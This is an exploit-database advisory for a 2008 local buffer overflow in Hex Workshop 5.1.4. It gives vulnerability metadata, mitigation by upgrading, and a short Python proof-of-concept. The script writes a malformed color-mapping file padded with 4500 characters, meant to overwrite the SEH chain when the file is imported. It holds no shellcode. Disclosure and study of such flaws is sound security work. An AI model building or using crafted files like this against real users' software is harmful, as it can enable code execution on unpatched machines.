Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow Poc

vendor:

Hex Workshop

by:

Encrypt3d.M!nd

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Hex Workshop

Affected Version From: 5.1.2004

Affected Version To: 5.1.2004

Patch Exists: YES

Related CWE: N/A

CPE: a:bpsoft:hex_workshop:5.1.4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2008

Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow Poc

Hex Workshop 5.1.4 is vulnerable to a local buffer overflow when importing a specially crafted Color Mapping File (enc.cmap). By importing the file, a buffer overflow occurs, overwriting the SEH chain and allowing arbitrary code execution.

Mitigation:

Upgrade to the latest version of Hex Workshop 5.1.5

Source

Exploit-DB raw data:

# Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow Poc
# other versions are affected 
# 
# By:Encrypt3d.M!nd
# Merry Christmas & Happy New Year 2009
#
# Greetz:-=Mizo=-(Perra :-l),L!0N,El Mariachi,MiNi SpIder,GGY,and all my friends
################################################################################
#
# Just import (enc.cmap) From (Tools>Color Mapping) And See What Happen ^_^
# I Think it's Easy To Exploit but need some work *_^

chars = "A"*4500

foot = "\x20\x3D\x20\x52\x47\x42\x28\x30\x2C\x20\x30\x2C\x20\x30\x29\x2C\x20\x52\x47\x42\x28\x31\x36\x30\x2C\x20\x31\x36\x30\x2C\x20\x31\x36\x30\x29"

file=open('enc.cmap','w+')
file.write("\x22"+chars+"\x22"+foot)
file.close()

# milw0rm.com [2008-12-28]